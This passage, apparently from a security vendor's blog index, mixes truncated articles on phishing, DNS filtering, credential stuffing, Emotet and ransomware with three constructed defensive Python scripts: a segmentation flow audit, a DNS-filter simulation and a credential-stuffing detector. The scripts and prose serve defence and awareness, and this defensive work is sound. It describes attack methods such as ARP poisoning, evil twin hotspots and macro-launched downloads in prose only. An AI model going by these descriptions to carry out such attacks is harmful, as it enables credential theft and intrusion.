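    if src_zone == dst_zone:
        # Same segment: no router or firewall in the path, so only host-based
        # controls or a sensor inside the segment can see this traffic.
        if src_zone == "workstations" and flow["dport"] in LATERAL_PORTS:
            return "violation", f"workstation-to-workstation port {flow['dport']} (lateral movement path)"
        return "intra-zone", f"{src_zone} -> {dst_zone} not inspected by the firewall"
    if flow["dport"] in ALLOWED.get((src_zone, dst_zone), set()):
        return "allowed", f"{src_zone} -> {dst_zone}:{flow['dport']}"
    return "violation", f"{src_zone} -> {dst_zone}:{flow['dport']} not in policy"


def parse_flow(line):
    """Constructed format: '<timestamp> <proto> <src>:<sport> -> <dst>:<dport>'."""
    timestamp, proto, src, _arrow, dst = line.split()
    src_ip, _sport = src.rsplit(":", 1)
    dst_ip, dport = dst.rsplit(":", 1)
    return {"ts": timestamp, "proto": proto, "src": src_ip, "dst": dst_ip, "dport": int(dport)}


# Constructed flow records.
SAMPLE_FLOWS = [
    "2023-06-01T09:00:01 tcp 10.10.4.21:51000 -> 10.20.0.5:443",         # workstation to a server
    "2023-06-01T09:00:02 tcp 10.10.4.21:51001 -> 10.30.0.8:5432",        # workstation straight to the DB
    "2023-06-01T09:00:03 tcp 10.10.4.21:51002 -> 10.10.7.14:445",        # workstation-to-workstation SMB
    "2023-06-01T09:00:04 tcp 192.168.50.33:40000 -> 10.20.0.5:22",       # guest wifi to a server
    "2023-06-01T09:00:05 tcp 10.99.0.2:40100 -> 10.30.0.8:5432",         # admin host to the DB
    "2023-06-01T09:00:06 tcp 192.168.50.33:40001 -> 93.184.216.34:443",  # guest wifi to the internet
]


def audit(lines):
    """Return [(line, verdict, detail)] for every flow line."""
    return [(line, *evaluate(parse_flow(line))) for line in lines]


if __name__ == "__main__":
    for line, verdict, detail in audit(SAMPLE_FLOWS):
        print(f"{verdict:10} {detail}")
```

On the constructed records the audit allows the workstation-to-server, admin-to-database and guest-to-internet flows and flags the other three: a workstation talking straight to the database, guest WiFi reaching a server over SSH, and SMB between two workstations. That last one is the case segmentation alone does not solve, since both hosts sit in the same zone; the script reports it so that the gap is visible rather than silently counted as "not the firewall's problem".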

How to Improve Your Defenses Against Phishing Without Breaking the Bank

Phishing remains the number one cyber threat to businesses and there are no signs that cybercriminals will be abandoning phishing any time soon. Phishing is defined as the use of deception to fraudulently obtain sensitive information, which often involves impersonating trusted individuals and using social engineering techniques to trick people into disclosing their login credentials.

It is not necessary to be a hacker to conduct phishing campaigns. All that is needed is a modicum of technical expertise and the ability to send emails. The phishing kits that are loaded onto websites to harvest credentials do not need to be created from scratch, as they can simply be purchased on hacking forums and dark net websites. A potential phisher only needs to pay for the kit, which typically costs between $20 and $1,000, host it on a website, and send emails, SMS messages, or instant messages to direct users to the website. The ease of obtaining a phishing kit makes this method of attacking businesses simple. All that is needed is a plausible lure, and many people will disclose their credentials.

Figures released by security awareness training companies show just how frequently employees fall for these scams. Around 30% of phishing emails are opened by recipients, and 12% of those individuals either open attachments or click hyperlinks in emails. One 2020 study, conducted on 191 employees of an Italian company, showed no significant difference between employees’ demographics and susceptibility to phishing. Anyone can fall for a phishing scam. Interestingly, that study, published by the Association for Computing Machinery, also found that while the employees believed their security awareness training had been effective, it did not appear to have any effect on their susceptibility to phishing attacks. Phishing is popular with cybercriminals because it is one of the easiest scams to perform, and it is often successful and profitable.

Security awareness training will help to prepare employees and, if performed properly, regularly, and with subsequent phishing simulations to reinforce the training, can help to reduce susceptibility, but what is most important is to...

What is DNS Filtering?

DNS filtering – or Domain Name System filtering to give it its full title – is a technique of blocking access to certain websites, webpages, and IP addresses. The DNS is what allows easy-to-remember domain names to be used – such as Wikipedia.com – rather than typing in very difficult-to-remember IP addresses – such as 198.35.26.96. The DNS maps domain names to IP addresses to allow computers to find web resources. When a domain is purchased from a domain registrar and that domain is hosted, it is assigned a unique IP address that allows the site to be located.

When you attempt to access a website, a DNS query will be performed. Your DNS server will look up the IP address of the domain/webpage, which will allow your browser to make a connection to the web server where the website is hosted. The webpage will then be loaded. The actual process involves several different steps, but it is completed in a fraction of a second.

So how does DNS Web Filtering Work?

With DNS filtering in place, rather than the DNS server simply returning the IP address if the website exists, the request will be subjected to certain controls. DNS blocking occurs if a particular webpage or IP address is known to be malicious. The DNS filter will use blacklists of known malicious websites and previous crawls of new websites and web pages, or web content will be assessed in real time if the web page or website has not previously been crawled and categorized. If the website being accessed is determined to be malicious or otherwise violates pre-defined policies, instead of the user being connected to the website, the browser will be directed to a local IP address that displays a block page explaining why the site cannot be accessed.

This control could be applied at the router level, via your ISP, or by a web filtering service provider. In the case of the latter, the user – a business for instance – would point their DNS to the service provider. That service provider maintains a blacklist of malicious webpages/IP addresses and access to those sites is prevented. Since the service provider will also categorize webpages, the DNS filter can also be used to block access to certain categories of...
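The decision a filtering resolver makes on each query (blacklist hit or forbidden category: answer with the block-page address; otherwise answer with the real address) is small enough to show end to end. The following is an added example for this page and is not WebTitan's or any DNS filter's code; the stand-in upstream zone data, the category labels, the policy, the reserved .example names and the block-page address 10.0.0.250 are all constructed. Real products replace the static tables with crawled categorization and real-time classification, which this example marks as "uncategorized" rather than inventing.

```python
"""DNS filtering resolver: added example, not WebTitan's code.

Simulates the decision a DNS filter makes before answering a query: a
domain on the blocklist, or in a category the policy forbids, is answered
with the address of a local block page instead of its real address.
Zone data, categories, policy and addresses are constructed for illustration.
"""

BLOCK_PAGE_IP = "10.0.0.250"   # constructed: local host serving the block page

# Constructed stand-in for upstream resolution (domain -> IP)
UPSTREAM = {
    "intranet.example": "192.0.2.10",
    "news.example": "192.0.2.20",
    "casino.example": "192.0.2.30",
    "cdn.bad.example": "192.0.2.40",
}

BLOCKLIST = {"bad.example"}  # known-malicious zones; subdomains inherit the verdict
CATEGORIES = {               # constructed categorization of crawled sites
    "casino.example": "gambling",
    "news.example": "news",
    "intranet.example": "business",
}
POLICY_BLOCKED_CATEGORIES = {"gambling", "malware"}   # the business's policy


def parent_chain(domain):
    """Yield the domain and each of its parents: a.b.c -> a.b.c, b.c, c."""
    labels = domain.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


def classify(domain):
    """Blocklist wins over category; a zone's verdict covers its subdomains."""
    for name in parent_chain(domain):
        if name in BLOCKLIST:
            return "malware"
    for name in parent_chain(domain):
        if name in CATEGORIES:
            return CATEGORIES[name]
    return "uncategorized"  # a real filter would classify the content in real time


def resolve(domain):
    """Return (answer_ip, action, reason) the filtering resolver would give."""
    category = classify(domain)
    if category in POLICY_BLOCKED_CATEGORIES:
        # Browser connects to the block page instead of the real site
        return BLOCK_PAGE_IP, "block", f"category {category}"
    ip = UPSTREAM.get(domain.rstrip(".").lower())
    if ip is None:
        return None, "nxdomain", "no such name"
    return ip, "allow", f"category {category}"


def query_log_line(client_ip, domain):
    """One log line per decision, the record an admin reviews later."""
    ip, action, reason = resolve(domain)
    return f"{client_ip} {domain} -> {ip or 'NXDOMAIN'} [{action}: {reason}]"


if __name__ == "__main__":
    for name in ["intranet.example", "news.example", "casino.example",
                 "cdn.bad.example", "nothere.example"]:
        print(query_log_line("10.10.0.5", name))
```

Walking the parent chain is what makes a single blocklist entry for bad.example also catch cdn.bad.example, which matters because attackers rotate hostnames under a zone far more often than they rotate zones.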

How is the Cyber Threat Landscape Likely to Change in 2021?

COVID-19 presented many new opportunities for cybercriminals, many of which have proven to be highly successful. In the early days of the pandemic, when it became clear that the new coronavirus was spreading beyond the borders of China and concern about the virus grew, cybercriminals switched from their normal phishing campaigns and started adopting COVID-19 lures. Phishing campaigns were conducted offering advice about the virus and potential cures, as people craved information that was in short supply. Fake COVID-19 tracking apps and websites were set up that collected sensitive information or installed malware, and PPE shortages saw fake shops set up offering non-existent supplies. Then there were fake charities, disinformation campaigns, and phishing scams related to job retention schemes, self-employment income support, government coronavirus loans, and fake tax rebates.

The move to remote working due to the pandemic saw hackers targeting vulnerabilities in remote working solutions such as VPNs, and throughout 2020 ransomware gangs were extremely active, especially in Q3 and Q4 2020 when attacks soared. As we move into 2021, cybercriminals are likely to continue to exploit the pandemic to steal credentials, access sensitive data, and spread malware and ransomware, so it is important for businesses not to let their guard drop and to continue to ensure that they have appropriate protections in place to block threats.

The Cyber Threat Landscape in 2021

The high level of ransomware attacks in the last quarter of 2020 is likely to continue in 2021. There are no signs that cybercriminals will reduce attacks, as they are still proving to be profitable. The healthcare industry is likely to continue to be targeted, with cyberattacks on pharmaceutical and clinical research firms also extremely likely. Now that COVID-19 vaccines have been approved and are starting to be rolled out, cybercriminals have yet another opportunity. The vaccine rollout is likely to take many months and it could well be the autumn or later before most people receive the vaccine. Cybercriminals have already adopted COVID-19 vaccine lures to obtain sensitive information and spread...

How to Protect Accounts from Credential Stuffing Attacks

The importance of choosing strong and unique passwords for every account you create has been highlighted by a recent data breach at the music streaming service Spotify. Security researchers identified a database that had been exposed on the Internet which contained the username and password combinations of around 300 million individuals. It is unclear where the database came from, although it is likely that it had been amalgamated from data leaks from several major data breaches of online platforms. Interestingly, within the 300 million-record database was a field stating whether the username/password could be successfully used to log in to a Spotify account. According to the researchers, an estimated 300,000 to 350,000 Spotify accounts had been breached.

This breach clearly demonstrates how a data breach at one company can provide the usernames and passwords needed to gain access to accounts at another. When a username/password is obtained in a cyberattack, it can be used to try to access other accounts that share the same username. A username is often an email address. People may have more than one email address, but there is usually one that is used across most platforms. There is nothing wrong with that of course, but there is a problem with using the same password with that email address on multiple online platforms. If there is a breach at one platform, the password can be used to access many other accounts. In this example, up to 350,000 Spotify users had reused their password on more than one platform. The Spotify breach victims may well have had several other accounts breached if they used their password on other platforms too.

The credentials to the breached Spotify accounts could easily be sold to anyone who wanted a cheap Premium Spotify account. There have been many reports of passwords being changed to lock the real account holder out of their account. The accounts also contain personal information that could be used in further attacks, such as to make convincing phishing emails to obtain the information necessary for identity theft and other types of fraud. Trying 300 million username and password combinations is a time-consuming process, but that...
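Because credential stuffing replays pairs leaked from other platforms, it leaves a signature in a service's own authentication logs that ordinary users do not: one source trying many different usernames in a short window with a low success rate, and the few successes are exactly the accounts whose owners reused a password. The following detection logic is an added example for this page, not WebTitan's or Spotify's code; the log format, the sample lines (using reserved documentation addresses) and the thresholds are constructed, and detect_stuffing is a hypothetical name.

```python
"""Credential stuffing detection over auth logs: added example, not vendor code.

A single source producing failed logins across many *different* usernames
in a short window looks nothing like a user mistyping one password. This
flags such sources and lists the accounts where the replayed credential
worked, i.e. the users who reused a password and need a forced reset.
Log format, sample lines and thresholds are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: "<ISO time> <source ip> <username> <OK|FAIL>"
SAMPLE_LOG = """\
2021-01-05T10:00:01 203.0.113.7 alice@example.com FAIL
2021-01-05T10:00:02 203.0.113.7 bob@example.com FAIL
2021-01-05T10:00:02 203.0.113.7 carol@example.com FAIL
2021-01-05T10:00:03 203.0.113.7 dave@example.com OK
2021-01-05T10:00:04 203.0.113.7 erin@example.com FAIL
2021-01-05T10:00:05 203.0.113.7 frank@example.com FAIL
2021-01-05T10:00:30 198.51.100.9 alice@example.com FAIL
2021-01-05T10:00:45 198.51.100.9 alice@example.com FAIL
2021-01-05T10:01:10 198.51.100.9 alice@example.com OK
"""


def parse(lines):
    """Yield (timestamp, ip, username, succeeded) for each non-empty line."""
    for line in lines.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        yield datetime.fromisoformat(ts), ip, user.lower(), result == "OK"


def detect_stuffing(lines, window=timedelta(minutes=5), min_users=5, max_ok_ratio=0.25):
    """Return {ip: summary} for sources that try many distinct usernames in a window.

    A human who forgot a password retries one username; a stuffing run cycles
    through leaked usernames, so distinct-user count is the discriminating signal.
    """
    events = defaultdict(list)
    for ts, ip, user, ok in parse(lines):
        events[ip].append((ts, user, ok))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        for i, (start, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - start <= window]
            users = {u for _, u, _ in in_window}
            successes = sum(1 for _, _, ok in in_window if ok)
            if len(users) >= min_users and successes / len(in_window) <= max_ok_ratio:
                flagged[ip] = {
                    "distinct_users": len(users),
                    "attempts": len(in_window),
                    "successes": successes,
                    # accounts where the replayed credential worked: reset these
                    "compromised": sorted(u for _, u, ok in in_window if ok),
                }
                break
    return flagged


if __name__ == "__main__":
    for ip, summary in detect_stuffing(SAMPLE_LOG).items():
        print(ip, summary)
```

The source 198.51.100.9 retries a single username and is left alone, while 203.0.113.7 is flagged and dave@example.com is surfaced as the account to reset and enroll in multi-factor authentication; rate limiting on the source alone would miss that second, more important outcome.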

Why Remote Workers are More Susceptible to Phishing Attacks

Many companies now allow employees to work from home for at least some of the week. The number of companies allowing remote working increased by 300% from 1996 to 2016, according to a Gallup poll. In 2016, Gallup found that 43% of employees said they spent at least some time working away from their co-workers. Then came the COVID-19 pandemic, which forced companies to allow virtually their entire workforce to work from home as countrywide lockdowns were introduced. Lockdowns have now been eased and employees are returning to their offices, but many have got used to home working and want to have the option to continue. Since many employers noticed no drop in productivity – some even saw productivity increases – it is likely that some employers will continue to allow employees to work from home if preferred. A study by Cartridge People in the UK found 32% of UK office workers were planning to continue to work from home after the lockdown was eased.

Remote Working Increases Security Risks

While productivity may not decrease and employees may be happy working from home, home working is not without its risks. There are security concerns with remote working. It is harder for IT teams to secure devices and networks when the workforce is spread geographically and is not under the protection of the corporate firewall. With many workers connecting to their corporate networks remotely, it becomes harder to identify malicious connections. It is also much easier for threat actors to attack remote workers who connect to the Internet via consumer-grade routers, which are often never updated and have many security holes.

With office workers, it is easy to check whether a request to change bank account information, or any other out-of-band request, is genuine. All it takes is a quick visit to the employee’s desk. While phone calls can be made, performing these checks is more time consuming and complicated with remote workers. The pandemic also forced many companies to allow their employees to work remotely using their personally-owned devices, which may lack the security measures implemented on corporate-owned devices. There are also many distractions in the...

5 Tips for Businesses to Improve Defenses Against Phishing Attacks

Phishing is one of the biggest cyber threats faced by businesses, and stopping phishing attacks from succeeding can be a big challenge. The purpose of phishing is usually to obtain sensitive information, most commonly employee credentials for email accounts, cloud services, social media accounts, or credit card or banking credentials. This is also achieved through the use of malware that is delivered using phishing emails. Phishing attacks can take place over the telephone, via text message, social media networks, instant messaging, or any other form of communication, but most commonly the attack vector is email.

For a phishing attack to be successful, user interaction is usually required. An employee must be convinced to part with the information that the phisher is targeting, and a wide range of lures are used to encourage that. Social engineering techniques are also used to encourage prompt action to be taken – to respond without really thinking too much about the legitimacy of the request.

At its most basic level, a phishing attack requires little skill and next to no financial outlay; however, many phishing campaigns now being conducted have been carefully crafted: research is conducted on the companies and individuals being targeted, and the websites used to harvest credentials are skillfully created and often carbon copies of the genuine websites that they spoof. Phishing emails often appear to have been sent from a trusted brand or contact, either by spoofing a genuine email address or using a compromised email account. Some phishing attempts are laughable and are easily identified; others are much harder to identify, with some of the most sophisticated phishing emails virtually indistinguishable from genuine email requests.

As a business, you should take steps to improve your defenses against phishing attacks, as failure to do so could easily result in a malware or ransomware infection, a costly data breach, theft of intellectual property, and damage to the reputation of your company.

Tips for Businesses to Improve Their Defenses Against Phishing Attacks

To help you improve your defenses and prevent phishing attacks from succeeding we have listed some of...

The Emotet Botnet is Back in Action Using New Tactics to Increase Emotet Malware Infections

The Emotet botnet sprang back to life and started sending large volumes of malicious spam emails earlier this month. The botnet consists of hundreds of thousands of computers that have been infected with Emotet malware and is capable of sending huge spam campaigns. Emotet malware steals usernames and passwords for outgoing email servers, which are used to send emails from a company’s legitimate email server. This tactic helps to ensure the emails are delivered because the mail servers used to send the messages are trusted. The volume of emails sent from those mail servers is also limited to stay under the radar and avoid detection by security teams.

The emails contain a malicious attachment or a hyperlink that directs the recipient to a website where Emotet malware is downloaded. These malicious sites often change, and most commonly are compromised WordPress sites. The attachments are commonly Word documents with malicious macros, which launch PowerShell commands that download the Emotet payload. Once installed, Emotet starts sending emails to infect more devices but is also used to deliver other malware payloads, typically a banking Trojan such as TrickBot or QakBot. Both Trojans have been distributed by Emotet malware in the latest campaign.

Emotet is one of the main malware threats, and was the leading malware threat in 2018 and 2019. It is also one of the most dangerous. Infection with Emotet will eventually also see a banking Trojan downloaded, and that Trojan is often used to deliver ransomware.

The Emotet gang targets businesses and uses a wide range of lures in its campaigns. Fake invoices, shipping notices, job applications, and purchase orders are often used. A commonly used tactic that has proven to be extremely effective is the hijacking of email threads. Emotet uses legitimate email threads and inserts links and attachments. The hijacking of email threads adds credibility to the emails, as it appears that the email is a response to a previous conversation with a known and trusted contact. The response appears to be a follow-up on a past conversation. The latest campaign has seen the Emotet gang adopt a new tactic, one that has not been used...

How to Defend Against Phishing Attacks on Remote Workers

There has been an increase in phishing attacks on remote workers using COVID-19 as a lure over the past few months. Multiple studies suggest the number of COVID-19 related phishing attacks has soared. The anti-phishing training company KnowBe4 placed the rise at about 600% in Q1 2020, and that rise has continued in Q2. As was pointed out by Microsoft, the total number of phishing attacks has not increased by any major degree during the COVID-19 public health emergency, as cyber actors have finite capabilities for conducting attacks. What has happened is that threat actors have abandoned their standard phishing campaigns, repurposed their phishing infrastructure, and are now using COVID-19 lures, and with good reason.

People crave information about the 2019 Novel Coronavirus, SARS-CoV-2, and COVID-19. There is a thirst for knowledge about the virus, how it infects people, how to prevent infection, and how great the risk is of catching it. With little information available about this new virus, finding out more required following the news from countries around the world that are involved in research. Unsolicited emails offering important information naturally had a high open rate, so it is no surprise that COVID-19 phishing attacks have increased.

To control the spread of the virus, countries have gone into lockdown, so businesses have had to allow their employees to work from home. The increase in home workers happened very quickly, so businesses did not have the time to prepare properly and that meant new risks were introduced. It is therefore no surprise that there has been an increase in data breaches during the COVID-19 pandemic. Cybercriminals have taken advantage of lapses in security, insufficient staff training, and the vulnerabilities that are introduced when employees are forced to work in an environment that has not been set up for remote working. IT teams have had to rapidly purchase new laptops to allow employees to work outside the office and there has not been time to properly secure those devices. VPN infrastructure was not sufficient to cope with the rapid increase in users. Home networks lack the security of corporate networks, and...

Cybercriminals Are Exploiting Uncertainty and Fear About Coronavirus and COVID-19

Cybercriminals are taking advantage of the 2019 Novel Coronavirus pandemic and are exploiting fear to spread malware and steal data. These tactics may not be new, but these campaigns pose a significant threat in the current climate of global fear and worry. People are naturally worried about contracting COVID-19 and will be concerned about the wellbeing of their friends and family members. Many people crave new information to help them avoid illness and protect their families. If that information arrives in an inbox, email attachments may be opened, and links clicked to malicious websites.

Even when training is provided to employees and they are taught not to respond to unsolicited messages, open email attachments, or click links in emails from unknown senders, mistakes can still be made. During the COVID-19 crisis, stress levels are high, and this can easily lead to decisions being taken that would not normally be made. Businesses have been forced to allow their employees to work from home, many of whom are now working in a home environment where there are many distractions. Many people do not have home offices where they can quietly work, and a challenging working environment also makes mistakes more likely. Those mistakes can prove very costly.

Phishing campaigns are being conducted targeting home workers as they are seen as low-hanging fruit and an easy way to gain access to business networks to install malware and ransomware, and steal sensitive data. Several campaigns have been detected that offer important advice on the 2019 novel coronavirus and impersonate authorities on disease control and prevention such as the U.S. Centers for Disease Control and Prevention (CDC), U.S. Department of Health and Human Services, UK National Health Service, and the World Health Organization (WHO). The phishing campaigns are credible, claim to offer important advice, and are likely to be opened by many individuals. These campaigns seek remote access credentials and distribute malware. Coronavirus maps that display the number of cases per country are being used on many websites, including a legitimate COVID-19 case tracking map on the Johns Hopkins University website....

How to Protect Remote Workers from Wi-Fi Threats

Today there is an increasingly mobile workforce. Workers are able to travel and stay connected to the office, and many employees are allowed to work remotely for at least some part of the week. While workers are in the office, security is not a problem for IT departments. Workers connect to the internal network, be that a wired or wireless network, and thanks to the protection of the firewall, their devices and the network are protected. The problem comes when workers move outside the protection of that firewall. Here IT departments struggle to ensure the same level of protection.

When workers are travelling for work or are between the home and the office, they often connect to public Wi-Fi hotspots. Connecting to those hotspots introduces risks. While connected, sensitive information could potentially be disclosed and intercepted. Malware could also be inadvertently downloaded. When a connection is made to the work network, that malware could easily be transferred.

Connecting to untrusted Wi-Fi networks is a major risk. These could be legitimate Wi-Fi services provided on public transport, in coffee shops, or city-wide Wi-Fi networks. While these networks may be safe, there is no telling who may be connected to that network. These Wi-Fi networks are often not monitored, and cybersecurity protections may be poor. There are several possible attack scenarios where an individual could perform malicious acts on users of the Wi-Fi network. One of the biggest risks is a man-in-the-middle attack. In this scenario, a Wi-Fi user will be connected to the network and will believe that they are securely accessing the internet, their email, or even the work network, when the reality is that their connection is anything but secure. A hacker could be listening in and could obtain information from that connection. Through ARP poisoning, a hacker could trick the Wi-Fi gateway and the user’s device into connecting to the hacker’s device, and traffic would be routed through that device where it is intercepted. An attacker could also create an evil twin hotspot. Here a rogue hotspot is created that closely mimics the genuine hotspot. A Wi-Fi user may mistakenly connect to the evil...

Rise in Cyberattacks on Law Firms Highlights Need for Additional Security Layers

The increase in cyberattacks on law firms has highlighted a need for greater security protections, especially to protect against phishing, malware, and ransomware. According to a recent Law.com report, more than 100 law firms are known to have experienced cyberattacks in the past five years: cyberattacks that have resulted in hackers gaining access to sensitive information and, in many cases, employee, attorney, and client information.

Investigations such as this are likely to uncover just a small percentage of successful cyberattacks, as many are resolved quietly and are not reported. Many law firms will be keen to keep a cyberattack private due to the potential damage it could do to a firm’s reputation. The reputation of a law firm is everything. As Law.com explained, there are different data breach reporting requirements in different states. If there is no legal requirement to report a data breach, it will not be reported. That means a breach will be reported to regulators or made public only if reportable information has potentially been compromised. It is therefore not possible to tell how many successful cyberattacks on law firms have occurred. However, there has been a steady rise in reported cyberattacks on law firms, as is the case with attacks on other industry sectors. Law.com’s figures are likely to be just the tip of the iceberg.

From the perspective of cybercriminals, law firms are a very attractive target. The types of information stored on clients are incredibly valuable and can be used for extortion. Information on mergers and takeovers and other sensitive corporate data can be used to gain a competitive advantage. Cybercriminals are also well aware that if they can deploy ransomware and encrypt client files, there is a higher than average probability that the ransom will be quietly paid.

Based on the information that has been made public about law firm data breaches, one of the main ways that law firms are attacked is via email. Many of the data breaches started with a response to a phishing or spear phishing email. Phishing allows cybercriminals to bypass even sophisticated cybersecurity protections as it targets a well-known...

Rise in Ransomware Attacks on Education Institutions Highlights Need for Improved Defenses

Ransomware attacks slowed in 2018, but the malicious file-encrypting malware is back with a vengeance. Ransomware attacks on educational institutions have soared this year, and as the attackers are well aware, these attacks can be extremely profitable. There have been 182 reported ransomware attacks so far this year and 26.9% of those attacks have been on school districts and higher education institutions. The increase has seen education become the second most targeted sector behind municipalities (38.5%) but well ahead of healthcare organizations (14.8%).

The reason why the number of ransomware attacks on educational institutions, healthcare, and municipalities is so high compared to other sectors is that attacks are relatively easy to perform and there is a higher than average chance that the ransoms will be paid. Attacks on municipalities mean they can’t access computer systems, and essential services grind to a halt. Police departments can’t access criminal records, courts have to be shut down, and payments for utilities cannot be taken. If hospitals can’t access patient data, appointments have to be cancelled out of safety concerns. In education, teachers cannot record grades and student records cannot be accessed. Administration functions grind to a halt and a huge backlog of work builds up. Some of the recent ransomware attacks on school districts have seen schools forced to send students home. Monroe-Woodbury Central School District in New York had to delay the start of the school year due to its ransomware attack. If students need to be sent home, there is often backlash from parents – not only because their children are not getting their education, but because childcare then needs to be arranged.

The costs of these attacks are considerable for all concerned. Each day without access to systems costs schools, universities, municipalities, and hospitals a considerable amount of money. Downtime is by far the biggest cost of these attacks, far greater than any ransom payment. It is no surprise that even when ransom demands are for tens or hundreds of thousands of dollars, they are often paid. The cost of continued losses as a result of the attacks makes paying...

Ransomware Modifications Double as Cybercriminals Step up Attacks on Businesses

2017 was a bad year for ransomware attacks, but as 2018 progressed it was starting to look like the file-encrypting malware was being abandoned by cybercriminals in favor of more lucrative forms of attack. Between 2017 and 2018 there was a 30% fall in the number of people who encountered ransomware, and the number of new ransomware variants continued to decline throughout 2018; however, that trend has now been reversed. 2019 has seen a sharp increase in attacks. Figures from Malwarebytes indicate there was a 195% increase in ransomware attacks in Q1 2019, and that increase has continued in Q2.

A new report from Kaspersky Lab has shown that not only are attacks continuing to increase, the number of new ransomware variants being used in these attacks is also increasing sharply. Kaspersky Lab identified 16,017 new ransomware modifications in Q2 2019, which is more than twice the number of new ransomware modifications detected in Q2 2018. In addition to updates to existing ransomware variants, Q2 2019 saw 8 brand new malware families detected. Kaspersky Lab tracked 230,000 ransomware attacks in Q2, which represents a 46% increase from this time last year. Far from ransomware dying a slow death, as some reports in 2018 suggested, ransomware is back and is unlikely to go away any time soon.

Not only are attacks increasing in frequency, ransom demands have increased sharply. Ransom demands of hundreds of thousands of dollars are now the norm. Two Florida cities paid a combined total of $1 million for the keys to unlock files encrypted by ransomware. Jackson County in Georgia paid $400,000 for the keys to unlock the encryption that crippled its court system, and recently, a massive ransomware attack that impacted 22 towns and cities in Texas saw a ransom demand of $2.5 million issued.

Earlier this year, the developers of GandCrab ransomware shut down their popular ransomware-as-a-service offering. They claimed to have made so much money from attacks that they have now taken early retirement. Despite GandCrab ransomware being one of the most widely used ransomware variants for the past 18 months, the shutdown has not been accompanied...

Make Sure You are Protected Against Google Calendar Phishing Attacks

A Google Calendar phishing campaign is being conducted that abuses trust in the app to get users to click malicious hyperlinks. Cybercriminals are constantly developing new phishing tactics to convince end users to click links in emails or open email attachments. These campaigns are often conducted on organizations using Office 365. Campaigns are tested on dummy Office 365 accounts to make sure messages bypass Office 365 spam defenses. Messages are carefully crafted to maximize the probability of an individual clicking the link, and the sender name is spoofed to make the message appear to have been sent from a known and trusted individual.

Businesses that implement email security solutions that incorporate DMARC authentication can block the vast majority of these email spoofing attacks. Office 365 users that use a third-party anti-phishing solution for their Office 365 accounts can make sure malicious messages are blocked. Along with end user training, it is possible to mount a solid defense against phishing and email impersonation attacks.

A new phishing tactic is being used in an active campaign targeting businesses which achieves the same aim as an email-based campaign but uses a personal calendar app to do so. Phishing campaigns have one of two main aims – to steal credentials for use in a further attack or to convince the user to install some form of malware or malicious code. This is most commonly achieved using an embedded hyperlink in the email that the user is urged to click. In the Google Calendar phishing attacks, events are added to app users’ calendars along with hyperlinks to the phishing websites. This is possible because the app adds invites to the calendar agenda, even if the invite has not been accepted by the user. All the attacker needs to do is send the invite. As the day of the fictitious event approaches, the user may click the link to find out more. To increase the likelihood of the link being clicked, the attacker sets event reminders so the link is presented to the user on multiple occasions. This attack method is only possible with Google Calendar in its default setting. Unfortunately, many users will not have updated their settings...

FBI Issues HTTPS Phishing Warning

The FBI’s Internet Crime Complaint Center (IC3) has issued a warning about the increasing number of phishing websites using HTTPS. The green padlock next to a URL once gave an impression of security. Now it gives a false sense of security to many internet users. HTTPS, or Hypertext Transfer Protocol Secure to give it its full name, indicates the website holds a valid certificate from a trusted third party. That certificate means the connection is secured: any data transmitted between the browser and the website will be encrypted to prevent interception in transit.

The public has been taught to look for the green padlock and HTTPS before entering card details or other sensitive information. However, the padlock does not mean that the website being visited is genuine. It only means any information transmitted is secured in transit between the browser and the website. If you are buying a pair of shoes from Amazon, all well and good. If you are on a website controlled by a cybercriminal, HTTPS only means that the cybercriminal will be the only person stealing your data.

Cybercriminals create realistic phishing webpages that imitate well-known brands such as Microsoft and Google to obtain login credentials, or banks to obtain banking information. These phishing pages can be set up on dedicated phishing websites, or phishing kits can be added to previously compromised websites. Traffic is then generated to those webpages with an email phishing campaign. If one of the links in the email is clicked, the user will be directed to a website that requests some information. If the website starts with HTTPS and displays the green padlock, the user may mistakenly believe the site is genuine and that it is safe to disclose sensitive information.

The IC3 alert was intended to raise awareness of the threat from HTTPS phishing, make the public aware of the true meaning of the green padlock, and warn them never to trust a website just because its address starts with HTTPS. Businesses should take note and make sure they include HTTPS phishing in their security awareness training programs to raise awareness of the threat with employees. A web filter can greatly reduce the risk of HTTPS phishing...

Essential Anti-Phishing Controls for Businesses

Phishing is the number one threat faced by businesses, and attacks are increasing across all industry sectors. Businesses of all sizes are being targeted by hackers. The risk of phishing attacks should not be underestimated.

The High Cost of a Data Breach

A successful phishing attack that results in a data breach can be incredibly costly to resolve. A 2019 Radware survey suggests the cost of a successful cyberattack has increased to $1.1 million, while the Ponemon Institute’s Cost of a Data Breach Study in 2018 placed the average cost at $3.86 million. The Anthem Inc. data breach of 2015, which resulted in the theft of 78.8 million health plan members’ personal information, started with a phishing email. The attack resulted in losses well over $100 million. In 2017, a phishing email sent to a MacEwan University employee resulted in a fraudulent wire transfer of $11.8 million to the attacker’s bank account.

Essential Anti-Phishing Controls for Businesses

For most businesses there are two essential elements to anti-phishing defenses: a spam filtering solution to identify phishing emails and block them before they are delivered to employees’ inboxes, and training for staff to ensure that if a malicious email makes it past the perimeter defenses, it can be identified as such before any harm is caused. A spam filter is quick and easy to implement, although care must be taken to choose the correct solution. Not all spam filtering and anti-phishing solutions are created equal.

The Danger of Relying on Office 365 Anti-Phishing Controls

Many businesses now use Office 365 for email. 155 million business users (and growing) are now using Office 365. That makes Office 365 a major target for hackers. Microsoft does provide anti-phishing and anti-spam protection through its Advanced Threat Protection (ATP) offering for Office 365. ATP is an optional extra and comes at an additional cost.
ATP provides a reasonable level of protection against phishing, but ‘reasonable’ is not sufficient for many businesses. ATP is certainly better than nothing, but it does not provide the same level of protection as a third-party spam filtering solution from a dedicated cybersecurity solution...

WebTitan Cloud v Cisco Umbrella

